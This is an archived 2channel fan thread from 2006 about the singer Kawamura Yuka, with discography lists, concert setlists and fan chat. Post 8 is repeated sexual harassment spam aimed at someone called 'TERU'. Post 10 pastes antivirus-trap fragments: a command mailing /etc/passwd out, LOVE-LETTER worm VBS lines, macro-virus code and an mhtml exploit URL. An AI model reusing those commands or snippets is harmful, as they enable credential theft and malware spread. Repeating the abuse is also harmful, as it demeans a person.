2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【夜空を旅する】川村結花vol.6【僕ら流れ星】

1 :名無しの歌姫:2006/09/06(水) 00:38:40 ID:1pQlZJ/i
印税収入で意外と懐はあったかいかもしれない。
孤高のシンガーソングライター川村結花スレッド第六弾です。
引き続きマターリと応援していきましょう。

過去ログ、ディスコグラフィは>>2-5あたり

2 :名無しの歌姫:2006/09/06(水) 00:39:17 ID:1pQlZJ/i

公式ホームページ
http://www.kawamurayuka.com/

前スレ
【失いながら】川村結花Vol.5【叶えながら】
http://music5.2ch.net/test/read.cgi/musicjf/1127920285/

歴代スレ
【忘れないけど】川村結花VOl4.5【思い出さない】
http://music5.2ch.net/test/read.cgi/musicjf/1100696009/
【あったか】川村結花vol.4【さみしい】
http://ex5.2ch.net/musicj/kako/1095/10953/1095376867.html
【毎日バナナを】川村結花Vol.3【買ってあげよう】
http://ex5.2ch.net/test/read.cgi/musicj/1069420473
【忘れないから】川村結花スレ【思い出さない】(vol.2扱い)
http://music2.2ch.net/test/read.cgi/musicj/1044530639/
川村結花はどうですか?(vol.1扱い)
http://tv3.2ch.net/musicj/kako/1032/10329/1032927314.html

姉妹スレ
川村結花スレッドがない
http://curry.2ch.net/musicj/kako/999/999530034.html
〜川村結花〜PIANO NIGHT第一夜〜
http://music.2ch.net/musicj/kako/1015/10153/1015348801.html
川村結花を地味に語りたい
http://music.2ch.net/musicj/kako/1018/10184/1018444734.html
〜☆〜川村結花について語れ!〜☆〜
http://curry.2ch.net/musicj/kako/997/997753543.html
川村結花のスレを再開します。
http://curry.2ch.net/musicj/kako/999/999951250.html



3 :名無しの歌姫:2006/09/06(水) 00:40:07 ID:1pQlZJ/i
シングル

【東芝EMI】
「あなたを失うことより」(c/w 背中の向こう側)1995.01.18
「苗字」(c/w わかり合えなくてもいい)1995.05.24
「『元気で』なんて言わないでね」(c/w どこにいても誰といても)1996.05.09
「一番」(c/w 小細工してもショーガナイ)1996.11.13

【エピックソニー/エピックレコード】
「ヒマワリ」(c/w もううそがつけなかった)1998.05.21
「夜空ノムコウ」(c/w ここにいるから)1998.09.09
「home/遠い星と近くの君」(両A面)1998.11.21
「Every Breath You Take」(c/w Touch)1999.02.20
「ときめきのリズム」(c/w マイルストーン)1999.04.29
「Travels」(c/w 靴の音)1999.09.22
「Doors」(c/w Never Ever)2000.02.19
「ファンタジー」(c/w また会えるふりしてね)2001.02.07
「Festa」(c/w Z・O・A)2001.06.06
「エチュード〜春盤〜」(全4曲) 2002.04.24
「知らないままじゃなくてよかった」(c/w バナナ)2001.10.24
「ビューティフル・デイズ」(c/w 同曲インストver/オールゴールver)2003.02.19


4 :名無しの歌姫:2006/09/06(水) 00:41:04 ID:1pQlZJ/i
アルバム

【東芝EMI】
「ちょっと計算して泣いた」1995.01.18
「とりあえず朝はくる」1996.05.29

【エピックソニー/エピックレコード】
「Lush Life」1999.04.01
「home again」2000.04.19
「farewells」2001.08.01
「オールディーズ〜夏盤〜」(ミニアルバム)2002.08.07
「朝焼けの歌〜秋・冬盤〜」(ミニアルバム)2002.10.23
「around the PIANO」2003.03.19
「Yuka Kawamura Best "Works"」(ベストアルバム)2003.12.03

【Station kids Records】
「native colors」 2004.06.23

【R&C】
「a half note」(ミニアルバム)2005.11.23

DVD/VIDEO
【エピックレコード】
「Another Days〜9 Music Videos and A Short Movie〜」(クリップ集)2001.08.22


5 :名無しの歌姫:2006/09/06(水) 00:41:59 ID:1pQlZJ/i
テンプレ終了。以下マターリご歓談ください。

6 :名無しの歌姫:2006/09/06(水) 00:56:17 ID:HTJrpI2z
>>1
乙です。

7 :名無しの歌姫:2006/09/06(水) 00:56:25 ID:QKcNl8eC
>>1おつ

8 :名無しの歌姫:2006/09/06(水) 01:00:08 ID:wO07dNLG
ボーズ ◆batiSANVvk [晒しage]

TERUはただの馬鹿なんかじゃねぇ
何年経ってもカス音楽しか歌えない三十路ヤリマンニートだ
なのになんちゃってミュージシャン語ってるんだ
低脳だからな
TERUはドMだからな
いじめられるとビラビラ開いてマン汁たらして大喜びするからな
みんなドM三十路ヤリマンニートヘタレのTERUを
いじめてやってくれ
( ・ ∀ ・ )ニヤニヤ



ボーズ ◆batiSANVvk [晒しage]

TERUはただの馬鹿なんかじゃねぇ
何年経ってもカス音楽しか歌えない三十路ヤリマンニートだ
なのになんちゃってミュージシャン語ってるんだ
低脳だからな
TERUはドMだからな
いじめられるとビラビラ開いてマン汁たらして大喜びするからな
みんなドM三十路ヤリマンニートヘタレのTERUを
いじめてやってくれ
( ・ ∀ ・ )ニヤニヤ



ボーズ ◆batiSANVvk [晒しage]

TERUはただの馬鹿なんかじゃねぇ
何年経ってもカス音楽しか歌えない三十路ヤリマンニートだ
なのになんちゃってミュージシャン語ってるんだ
低脳だからな
TERUはドMだからな
いじめられるとビラビラ開いてマン汁たらして大喜びするからな
みんなドM三十路ヤリマンニートヘタレのTERUを
いじめてやってくれ
( ・ ∀ ・ )ニヤニヤ



ボーズ ◆batiSANVvk [晒しage]

TERUはただの馬鹿なんかじゃねぇ
何年経ってもカス音楽しか歌えない三十路ヤリマンニートだ
なのになんちゃってミュージシャン語ってるんだ
低脳だからな
TERUはドMだからな
いじめられるとビラビラ開いてマン汁たらして大喜びするからな
みんなドM三十路ヤリマンニートヘタレのTERUを
いじめてやってくれ
( ・ ∀ ・ )ニヤニヤ





9 :名無しの歌姫:2006/09/06(水) 03:05:10 ID:QJ0F9bU1
>>1

祝 新スレ

10 :名無しの歌姫:2006/09/07(木) 19:06:31 ID:CyX9bVgy
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

11 :名無しの歌姫:2006/09/08(金) 01:31:40 ID:5hB2t6zQ
なんでこんな過疎ってるスレに、ウイルス貼るかなw

10月あたりからラジオ復活情報無いですかねえ。。。
ハラ8みたいな、PodCastとかでもいいのですが。


12 :名無しの歌姫:2006/09/08(金) 03:11:51 ID:YIQEt9iK
音楽板はあがってるスレには片っ端からウィルスが張られるらしい

13 :名無しの歌姫:2006/09/09(土) 04:51:43 ID:se08LwTk
前スレ、完走せずに落ちちゃった(´・ω・`)ショボーン

14 :名無しの歌姫:2006/09/09(土) 09:21:58 ID:YwH+G0yk
話題がないから書き込むこともなかったんだよな
9月のデュオはまだ発表できないんだろうか

15 :名無しの歌姫:2006/09/10(日) 15:01:36 ID:kRa919vL
日曜日の夕方、またラジオやってほしいな

16 :名無しの歌姫:2006/09/10(日) 18:48:11 ID:0jJ7qj3n
>>14
未だに発表がないのはおかしいね。
このツアーもあっさり終了する悪寒。

17 :名無しの歌姫:2006/09/10(日) 23:31:19 ID:K1qHYgfa
みさぽんがアップ過剰になってきてます・・・

18 :名無しの歌姫:2006/09/11(月) 01:23:36 ID:HxA48a+t
残念ながらおだにーじゃないだろな。

19 :名無しの歌姫:2006/09/12(火) 01:29:59 ID:NVC5dyIz
ウイルス?全然反応しないけど。このスレ以外にも
にたような変な文字列のレスがあるけど、俺の環境では
何も起こらなかった。専ブラで見ているから!?

20 :名無しの歌姫:2006/09/12(火) 01:42:26 ID:OYNhkwHx
>>19
使ってるアンチウィルスソフトによる。
ノートン先生が引っかかるらしい。

21 :名無しの歌姫:2006/09/12(火) 11:31:02 ID:ks+lD6OB
McAFeeも引っかかるな
まあNGワード指定してると平気なんだけど。

22 :名無しの歌姫:2006/09/13(水) 01:59:42 ID:ZzliJCcl
Macでもヤヴァイの?アンチウイルスソフトもってないんだけど。。。

23 :名無しの歌姫:2006/09/13(水) 03:03:47 ID:7ImxBv2P
単なる誤作動だから気にする必要はないよ。
詳しくは「ノートントラップ」でググってみ。

24 :名無しの歌姫:2006/09/13(水) 15:46:57 ID:h8kGf/XL
遅ればせながら、A HALF NOTE 買ってきました。

「はなれた町で」
たまらなく好きです!

25 :名無しの歌姫:2006/09/14(木) 19:26:46 ID:qDOvl/jf
デュオ発表されたお

26 :名無しの歌姫:2006/09/15(金) 12:21:13 ID:K2vYj08e
関東は次いつかな。
クリスマス?

27 :名無しの歌姫:2006/09/16(土) 04:44:55 ID:ZLyOL2mh
はっ!もう三ヶ月前か!例年なら先行予約は今月中だっけ?来月だっけか?

28 :名無しの歌姫:2006/09/19(火) 21:50:12 ID:E2oAKHGP
新譜も待ち遠しい

29 :名無しの歌姫:2006/09/21(木) 19:26:09 ID:wM3tnJEE
川村結花

30 :名無しの歌姫:2006/09/22(金) 17:22:16 ID:391paAIj



31 :名無しの歌姫:2006/09/23(土) 20:54:42 ID:8kwn38Jy
書き込みしてはいけない空気?

32 :31:2006/09/23(土) 20:56:26 ID:8kwn38Jy
間違えました
すいません

33 :名無しの歌姫:2006/09/24(日) 14:19:39 ID:xRf7x+u1
>>31
話すネタがないだけです。
気にしないでください。

そういや最近シチューのCM(はなれた町で)をやたら見ますが、みなさんのところはどうでしょう?

34 :名無しの歌姫:2006/09/24(日) 18:29:56 ID:+BkFKfXx
えっそれ見たことないです@東京
どちらの地域にお住まいですか?
見てみたい!


35 :名無しの歌姫:2006/09/25(月) 01:12:45 ID:Wr684mBr
とりあえず今度の水曜日に「青い鳥」が出ますが、みなさん買う?

36 :名無しの歌姫:2006/09/26(火) 19:05:04 ID:TD99cTMd
>>34
東北在住ですが、日に2〜3回ぐらい流れます。
ハウスのCMなんですが、HPのCMライブラリーにはないですね・・・。

>>35
フライングで見かけましたが・・・今財布が厳しいので音楽配信ですますか思案中・・・

37 :名無しの歌姫:2006/09/26(火) 23:18:49 ID:71VwJBEJ
北海道2daysは良かったみたいだね。
ユカタンもいきっぱなしだったらしいし。


セットリストよろしく。

38 :名無しの歌姫:2006/09/26(火) 23:57:20 ID:sVhRfYLL
セットリスト漏れも知りたい!行った人ぜひ!

39 :名無しの歌姫:2006/09/28(木) 20:32:55 ID:iU0gGGQ+
>35
買わないけど渡辺美里ファンに好評みたいでよかった。

40 :名無しの歌姫:2006/09/28(木) 22:36:35 ID:bVqPmys1
ようつべに堂鎮きゅん

41 :名無しの歌姫:2006/09/28(木) 23:09:24 ID:QZcTnVkQ
誰か一人くらいは北海道2Days行ってここ見てる人いると思うんだけどなー

42 :名無しの歌姫:2006/09/29(金) 17:02:36 ID:q2gBW5oV
ミュージックフェアのTravelsを見てブッ飛んだ。

43 :名無しの歌姫:2006/09/29(金) 23:17:03 ID:i/nzah4J
>41
川村結花ライヴ「PIANO Seasons Vol.2」@小樽・北一ホール(北一硝子三号館)
 1.Theme of PIANO Seasons(仮)〜Pf.Solo〜
〜2.エンゲージ
(ここでA.G.入場)
 3.今年の恋
 4.アンフォゲタブル
 5.夕日が沈んだら
 6.わたしが知ってる
 7.バナナ
 8.冬が来た
〜9.誰もあなたには
〜10.?
〜11.星になるまで
(さらにE.B.入場。Trioに)
 12.Travels
 13.明日は明日
 14.Every Breath You Take
(アンコールもVo./A.G./E.B.のTrio)
 Encore-1.遠い星と近くの君
 Encore-2.朝焼けの歌
 Encore-3.Theme of PIANO Seasons(仮)〜feat. A.G.〜

44 :名無しの歌姫:2006/09/29(金) 23:19:23 ID:i/nzah4J
>43
それで、実は10曲めの歌詞はこういうのです。でもタイトルが分からない。
歌い出し。

♪ほっとしたような表情が寂しかった 本気じゃないわって笑ってみた


45 :名無しの歌姫:2006/09/29(金) 23:50:00 ID:t80NuBcl
>>43-44
乙!Travelやったんだ。聴きたかったな〜。
10曲目、それ多分新曲。サビが♪泣〜かな〜いで〜って歌でしょ?
CD早く出してくれ!!今年中にフルアルバムつくりますってライブで言ったの覚えてるぞ!w

46 :名無しの歌姫:2006/09/29(金) 23:52:24 ID:t80NuBcl
Travel"s"だなスマソ
興奮して打ち損じたw

47 :名無しの歌姫:2006/09/30(土) 00:06:54 ID:YorMhJVL
>45
>10曲目、それ多分新曲。サビが♪泣〜かな〜いで〜って歌でしょ?
早速のレスありがとうございます。そうです!
これがまた良い曲だったのです。そうですか、新曲だったのですか。
2時間くらいネットを彷徨って、引っかからなくて……。

「泣〜かな〜い〜で〜、泣〜かな〜い〜で〜、さよなら 私の恋心」

ちなみにセトリは、私が作ったものでは無いのですが……作られた方に
感謝です。

48 :名無しの歌姫:2006/09/30(土) 07:27:53 ID:jReymEJO
>>43
乙です。いきなりエンゲージやったのか。なんか意外w
アンフォゲタブル生で聴きたい…羨ましい。
>>45
作って欲しいけどね。でももう10月になるし難しいかも……。

49 :名無しの歌姫:2006/09/30(土) 19:12:37 ID:vRk9Ynnh
>43


50 :名無しの歌姫:2006/10/01(日) 01:28:44 ID:YjaXZTpM
川村結花ライヴ「PIANO Seasons vol.2」@ICF札幌リベラル教会

 1.Theme of PIANO Seasons(仮)〜Pf.Solo〜
〜2.home
(ここでE.B.入場)
 3.Travels
 4.(曲名判らず。すみません。楽曲1とします)
 5.atokata
 6.1999
 7.夕日が沈んだら
 8.エンゲージ
 9.冬が来た(東芝EMI時代の2nd『とりあえず朝は来る』内)
 10.誰もあなたには
 11.(楽曲2)
〜12.お引越し
 13.明日は明日(Skoop On Somebodyへの提供曲)
 14.朝焼けの歌
(退場「できずに」そのままEncoreへ)
 Encore-1.ときめきのリズム
 Encore-2.Every Breath You Take
 Encore-3.Theme of PIANO Seasons(仮)〜feat. E.B.〜


51 :名無しの歌姫:2006/10/01(日) 20:06:23 ID:vBjwa/0l
もうちょっとCD置いて

52 :名無しの歌姫:2006/10/01(日) 20:12:51 ID:3oN22nfi
>>50
なんで退場できなかったの?トラブル?

53 :名無しの歌姫:2006/10/03(火) 07:41:34 ID:N/Cj0FtD
張り逃げかw

54 :名無しの歌姫:2006/10/03(火) 09:04:33 ID:yI9RNrLQ
>>50 セットリストありがとうございます〜 嬉しい。

>>52
50さんではないですけど・・・
会場が教会だったので、退場するには
「ヴァージンロード」を歩かなくてはならなっかったのですよ。
それで躊躇したみたいで、退場はナシになりました。
ベースの方と退場→再入場するのが恥ずかしかった様子。


55 :名無しの歌姫:2006/10/04(水) 21:57:37 ID:mTT/XzqQ
dクス。

前に仙台の教会では何往復もしたのにさすがに二人で歩くのは抵抗あったかなw

56 :名無しの歌姫:2006/10/07(土) 07:37:27 ID:EYj7t721
ディナーショーケテーイage

57 :名無しの歌姫:2006/10/08(日) 21:01:58 ID:xzYpHk4G
結花さん好きな人は星空も好きな人多いですかね?
今日は23時頃をピークに「ジャコビニ流星群」の流れ星が見えるらしいです。夏のプラネタリウムでのライブを思い出します。
どんな曲が合いそうでしょう?

58 :名無しの歌姫:2006/10/08(日) 21:35:51 ID:gOmsVmKs
川村智花と似たような芸名だな。
川村智花ファンとしては嫌だな。

59 :名無しの歌姫:2006/10/09(月) 01:37:24 ID:8Z0bHyiN
>>57
やっぱ「星になるまで」じゃない?

60 :名無しの歌姫:2006/10/09(月) 14:38:50 ID:H5QUfqv1
川村智花
ttp://www.dd.iij4u.or.jp/~mryn/img/idol/ka/kawamura_chika.html

>>58
小僧じゃねぇか。巣に帰れ(・o・)/


61 :名無しの歌姫:2006/10/12(木) 09:06:42 ID:mCy3u1gA
ほしゅ

62 :名無しの歌姫:2006/10/14(土) 12:58:27 ID:1MwFoMy7
年末ライブ、あるのかな?

63 :名無しの歌姫:2006/10/15(日) 12:10:48 ID:PXOwWg2B
やばい、今朝夢に昔ふられた人が出てきて、起きて何となくfarewells聞いたら
詩が見事にハマって・・・・欝出汁脳 orz

64 :名無しの歌姫:2006/10/17(火) 08:20:18 ID:UilbiQEd
>>62
あるよ。




♪ 今年もやっちゃいます!クリスマスライブ@Blue Jay Way
2006-10-16 (Mon)


おととし、去年に続いてクリスマスの夜を川村結花の音楽と共に!
今年もクリスマスの東京で2daysのライブやります。春から続いてきたPIANO Seasonsのクリスマススペシャルでもあり、もちろん!恋人達のクリスマススペシャルでもありますよぉ!!

●PIANO Seasons X’masスペシャル〜Naked
原宿 Blue Jay Way
12月22日(金)
open:18:30 start:19:00
チケット:全席自由 \4,500(税込)※ドリンク代別途

●PIANO Seasons X’masスペシャル〜Trio
原宿 Blue Jay Way
12月24日(日)
open:14:30 start:15:00
チケット:全席自由 \6,000(税込)※ドリンク代別途

各公演チケット発売:11月11日(土)〜
各公演お問合せ:ぴあ 0570-02-9999
:Blue Jay Way 03-5785-1148

65 :名無しの歌姫:2006/10/17(火) 11:12:01 ID:ctXEvtAV
クリスマスのBJWは恒例行事になりつつあるな…

Trioは三人でやるんだなとわかるとして
Nakedはどんなことやるんだろ?


66 :名無しの歌姫:2006/10/17(火) 22:51:19 ID:un4NecFO
Trioに対してだから一人で弾き語りじゃないの?

67 :名無しの歌姫:2006/10/19(木) 00:05:53 ID:ONXdMeCX
英語に弱い俺はNakedをY!翻訳で訳してみた。
結果。


「裸である」


ちょwwwwwwwww

68 :名無しの歌姫:2006/10/19(木) 11:22:56 ID:AX1qllb9
いや〜裸なら観に行きたいけど・・・。
ピアノ演奏だけとか・・・「歌わない」ってやつではないの???

69 :名無しの歌姫:2006/10/19(木) 22:16:57 ID:NOirFgII
unpluggedなら行きてー

70 :名無しの歌姫:2006/10/21(土) 00:24:09 ID:cqX5PReI
クリスマス楽しみだな

71 :名無しの歌姫:2006/10/21(土) 11:02:57 ID:V7fUiF8J
プレオーダーのDMきたけど、さてどうするか・・・

72 :名無しの歌姫:2006/10/23(月) 22:17:43 ID:AdD2r9Ph
ホシュ

73 :名無しの歌姫:2006/10/25(水) 17:38:02 ID:CBHNRdYA
はなれた街でが心に沁みます

74 :名無しの歌姫:2006/10/26(木) 23:36:22 ID:YFetaRjc
ここが結花さんの本当のレスなのね。もう1つの方に行ってたよ。LushLife以来LIVEに行ってない。今回は仕事で行けなかった。生でバナナを聞きたいよ〜


75 :名無しの歌姫:2006/10/27(金) 00:36:38 ID:BVLSx9fn
もう一つって何処?

76 :名無しの歌姫:2006/10/27(金) 02:07:05 ID:Kf4n8CB7
【あなたを】川村結花【失うことより】
http://music5.2ch.net/test/read.cgi/musicjf/1155390391/

これみたいね

77 :名無しの歌姫:2006/10/27(金) 16:02:31 ID:VZCes2lm
そうです。なかなか更新されないからどうしたのだろうと思った。

78 :名無しの歌姫:2006/10/31(火) 00:18:06 ID:z1PoZqZx
age

79 :名無しの歌姫:2006/10/31(火) 20:52:41 ID:QGGz/7EO
「1999」みたいな歌ももっと歌って欲しいな

80 :名無しの歌姫:2006/10/31(火) 21:37:23 ID:sAC5+d9d
>>63

今更だけど、どんまい

81 :名無しの歌姫:2006/11/01(水) 17:45:31 ID:KMw+fv9V
つい先程NHKFMのラジオからこの方が歌っている「コイシイヒト」が流れたのですが
どのアルバムに入っているかどなたか分かりますでしょうか・・・?
ものすごく声が綺麗で思わず聴き入ってしまいました。
どなたか分かる方がいらっしゃいましたら宜しくお願いします。

あっ、それとCDをレンタルしてみたいのですが、どのアルバムがお勧めでしょうか?
コイシイヒトのような少し悲しい曲が好きなのですが・・・。
二つ質問してすみません。よろしければお願いします。

82 :名無しの歌姫:2006/11/01(水) 18:06:55 ID:5Ws+0j49
>>81
farewellsに収録。ちなみにliveバージョン

farewells、home again当たりがいんでないかな

83 :名無しの歌姫:2006/11/01(水) 18:24:40 ID:KMw+fv9V
>>82
即レスありがとうございます。早速借りてこようと思います。

教えていただいて本当にありがとうございました。

84 :名無しの歌姫:2006/11/01(水) 22:10:12 ID:zswT6CBm
>>81
私もfarewellsに一票
ここの住民の中にはそのアルバムで泣く人が多いかもしれません

85 :名無しの歌姫:2006/11/06(月) 20:47:15 ID:klx0w7VG
あげ

86 :名無しの歌姫:2006/11/08(水) 23:42:22 ID:g5Thkm1s
新聞にクリスマスディナーショーの広告が載ってたなー。

豪華ディナーは要らないのに…(-_-)
生歌だけ聞きたーい!!それだけで十分酔えます♪

87 :名無しの歌姫:2006/11/10(金) 17:09:32 ID:cYgto0G4
今からライブ行って来るっす。

88 :名無しの歌姫:2006/11/10(金) 20:23:03 ID:/rLes7sd
京都行けないからリストうpして〜

89 :名無しの歌姫:2006/11/12(日) 00:43:18 ID:hBDio3DA
で、いつも行ってくるスレがあってもリストはなしと・・・

90 :名無しの歌姫:2006/11/12(日) 04:34:36 ID:v74oyjZS
川村結花2006LIVE/PIANO Seasons〜Vol.2
京都文化博物館
11月10日(金)

01.Theme of PIANO Seasons
02.home
03.もううそがつけなかった
04.わたしが知ってる
05.アンフォゲタブル
06.バナナ
07.月
08.夜空ノムコウ
09.冬が来た
10.それでも明日の歌が聞こえる
11.(新曲)
12.星になるまで
13.サヨナラCOLOR
14.アケボノ
15.Every Breath You Take
【アンコール】
16.明日は明日
17.もううそがつけなかった
18.ときめきのリズム
19.Theme of PIANO Seasons

3曲目は結花タンが間違えて途中でstop。 あらためてアンコールで。

91 :名無しの歌姫:2006/11/12(日) 20:20:32 ID:ALAV/+Az

7曲目と13曲目はどんな歌なんだ?

92 :名無しの歌姫:2006/11/12(日) 21:01:18 ID:1StxQuQ5
>>90
月は桑田佳祐のカバー? 前にやってたことがあったよね確か。

93 :名無しの歌姫:2006/11/12(日) 22:39:11 ID:bPBbiDp/
「月」は桑田佳祐で正解。

「サヨナラCOLOR」はSUPER BUTTER DOGのカバー。
この曲を聴いて感激した竹中直人が同名の映画まで作っている。
SUPER BUTTER DOGのボーカル永積タカシはハナレグミとして活動中。
結花タンは以前からの永積ファン。
  www.kawamurayuka.com/yuka/04.html

94 :名無しの歌姫:2006/11/13(月) 00:04:43 ID:tNNxmKrN
マジでぇぇぇぇぇ!!!!結花さんのサヨカラ、めっちゃ聴きたい。
本当に名曲だよね、あれ。ハナレグミ+忌野清志郎のバージョンとか、もう・・・!!

95 :名無しの歌姫:2006/11/13(月) 21:40:46 ID:b6r0Jemt
サヨナラCOLORはヒーリングビーナスでもやったよね。
そのとき初めて聴いたけどホントに泣きそうになったよ。

96 :名無しの歌姫:2006/11/15(水) 08:18:46 ID:xNrdCBy5
日曜の夕方、寂しいよな

97 :名無しの歌姫:2006/11/17(金) 22:55:48 ID:YF5jYh56
シュートな質問を一つ
ソングライターとして実力は疑いようの無い結花タソだが
ボーカリストのとしてのレベルはどの程度だろう?
松たかこよりも上だと言い切れるだろうか?

98 :名無しの歌姫:2006/11/17(金) 23:26:31 ID:8bem5gb6
言い切りましょう。

99 :名無しの歌姫:2006/11/18(土) 04:30:20 ID:m8tyIBFr
邦楽板に昔そんなスレがあったなぁ…と思ったら今でもあったか

女性ボーカリスト歌唱力偏差値スレ3
http://music5.2ch.net/test/read.cgi/musicj/1163591495/

もちろんわれらが結花タンは話題にないわけだがwww

100 :名無しの歌姫:2006/11/19(日) 08:53:31 ID:fvBPV7yd
人知れず埋もれる才能。
まるで「のだめ」だな(笑)

101 :名無しの歌姫:2006/11/20(月) 00:51:20 ID:pPxvHe+Y
結花ちゃんのライブパフォーマンスは他のどのアーティストにも負けません!(断言)

102 :名無しの歌姫:2006/11/23(木) 19:11:26 ID:7S+MJa2d
名曲「朝焼けの歌」
 www.youtube.com/watch?v=hNA3ONASuPQ

103 :名無しの歌姫:2006/11/25(土) 04:58:30 ID:ghQEwUbm
GJ!!!!!!!!!


104 :名無しの歌姫:2006/11/25(土) 09:39:49 ID:Rv+6XJwh
朝焼け、重すぎてあまり好きな方の曲じゃないんだけど
生演奏で聴くのはやっぱりイイな。

105 :名無しの歌姫:2006/11/26(日) 19:39:36 ID:w8N6x82t
今更ながらときめきのリズムを聴いて一発でキタ。
22年も生きてて、何で今まで出会えなかったんだろうなぁ。チキショウ

106 :名無しの歌姫:2006/11/30(木) 22:37:00 ID:gKesVnwN
ほしゅ

107 :名無しの歌姫:2006/12/04(月) 17:04:38 ID:Guy7uSVF
遠く離れた街で あなたのことを想う

108 :名無しの歌姫:2006/12/04(月) 18:42:55 ID:6KrRKpi8
藤木直人に曲提供してるよ

109 :名無しの歌姫:2006/12/05(火) 22:38:05 ID:pPP50ri5
紅白への招待は
今年も
なかった

110 :名無しの歌姫:2006/12/06(水) 00:39:20 ID:cR/VrUCI
結花ちゃんにはあまりテレビに出てほしくないな。


111 :名無しの歌姫:2006/12/06(水) 01:11:15 ID:ORjGVXkz
結花タソが個人として紅白に出場することは生涯なさそうだけれど
誰かのバックでピアノを弾いていたりすることは十分考えられる

112 :名無しの歌姫:2006/12/06(水) 02:19:35 ID:MgqN8Poz
>>111
こんな感じか。
久しぶりに聴いたが月光ってやっぱりいい曲だな
ttp://www.youtube.com/watch?v=MRN2hHHcwP8


113 :名無しの歌姫:2006/12/06(水) 16:04:56 ID:2ca84qdJ
>>111
【それでも僕らは】

114 :名無しの歌姫:2006/12/09(土) 23:23:41 ID:O7ng7l1I
鬼束って最近見ないな

115 :名無しの歌姫:2006/12/10(日) 20:21:59 ID:Rv1TsfNO
もうちょっと可愛ければ売れたのにねw

116 :名無しの歌姫:2006/12/10(日) 20:30:04 ID:rh7KwxGr
どっちが?

117 :名無しの歌姫:2006/12/11(月) 18:41:38 ID:O0M8Du9i
川村結花

118 :名無しの歌姫:2006/12/14(木) 00:42:01 ID:4X6up5Bf
青い鳥のセルフカバー激しく希望。

119 :名無しの歌姫:2006/12/14(木) 07:57:01 ID:StpQawiW
次のアルバム出す機会あれば間違いなく入りそうw
久し振りにここのぞいたが、ディナーショーレスが全くないのにワラタ

120 :名無しの歌姫:2006/12/14(木) 23:24:49 ID:fb8PGLPs
>>119
リストのせてもここ反応うすいしね


121 :名無しの歌姫:2006/12/15(金) 07:28:03 ID:XiW+fxZc
まあ行った人だけが楽しければいいんじゃないかな。漏れも25日行くつもり。
小樽ディナーのクリスマスプレゼントは結花タンの曲のオルゴールだったらしい。

122 :名無しの歌姫:2006/12/15(金) 09:56:44 ID:oVsvajFJ
ぷっ! 結花タン 

123 :名無しの歌姫:2006/12/15(金) 17:26:22 ID:13g5gNKq
正確には「結花タソ」ってことか?

>>121
曲は何なんだろ・・・テラホシス・・・オクに網張っとこう・・・

124 :名無しの歌姫:2006/12/15(金) 18:34:44 ID:85nIm+05
オルゴールほすぃー(>_<)
曲も教えてほしい。


…ユカタンってお菓子あったよね?

125 :名無しの歌姫:2006/12/15(金) 19:53:26 ID:gwmTKSC2
誰もディナーショー行ってないのかな
>122みたいな無駄な煽りレスがあるとリストも貼りにくいのかw

126 :名無しの歌姫:2006/12/15(金) 21:06:07 ID:DFRoKHSa
さっきスパーで買い物していたら「わかりあえなくてもいい」のインストが流れていたので驚いた

127 :名無しの歌姫:2006/12/15(金) 23:04:15 ID:KwYTFqDB
ゆかたん半島

128 :名無しの歌姫:2006/12/16(土) 07:00:57 ID:srCNQqSX
♪ インターネットメディアに登場!! 2006-12-11 (Mon)

川村結花のトークがインターネットで楽しめます。
12月11日(月)より音楽サイト「BARKS」内のインターネット・ラジオ番組「M'z Style」に川村結花が登場!
パーソナリティーの山下久美子さんとの対談形式で進行するこの番組、Vol.1、Vol.2の2回に渡って音楽や日常のことなどなど、様々な話題が繰り広げられています!

さらに!同時にWEB MAGAZINE「STELLA」のFEATUREにも山下久美子さんとの対談で登場。クリスマスの話や音楽の話で盛り上がってます。こちらも前編/後編の2回でお届けします。是非チェックを!

ttp://www.barks.jp/feature/?id=1000026828

129 :名無しの歌姫:2006/12/16(土) 09:14:08 ID:HGehjhmZ
>>128
サルバドール情報乙!

130 :名無しの歌姫:2006/12/17(日) 17:36:57 ID:Hip8T84l
今年は A HALF NOTE をよく聴きました。
来年は新作を待ってます!

131 :名無しの歌姫:2006/12/19(火) 07:18:22 ID:Fuw8kiUH
22日はインストってレスあったけど歌は歌うんだろうね

132 :名無しの歌姫:2006/12/19(火) 08:08:10 ID:BlKgcrkr
>>131
ピアノ侍は一曲しか歌わなかったようだが

133 :名無しの歌姫:2006/12/22(金) 13:50:03 ID:i9qpm/Fn
いよいよ今晩だね

134 :名無しの歌姫:2006/12/22(金) 21:12:42 ID:dj/YDJLT
行ってきた
ピアノ侍ではなくて従来のピアノナイトのような一人ひき語りだったよ

135 :名無しの歌姫:2006/12/22(金) 22:36:33 ID:2Y+s60/Z
選曲がおそろしく豪華だった。
冬らしい選曲だったけどクリスマスらしくはなかったなw
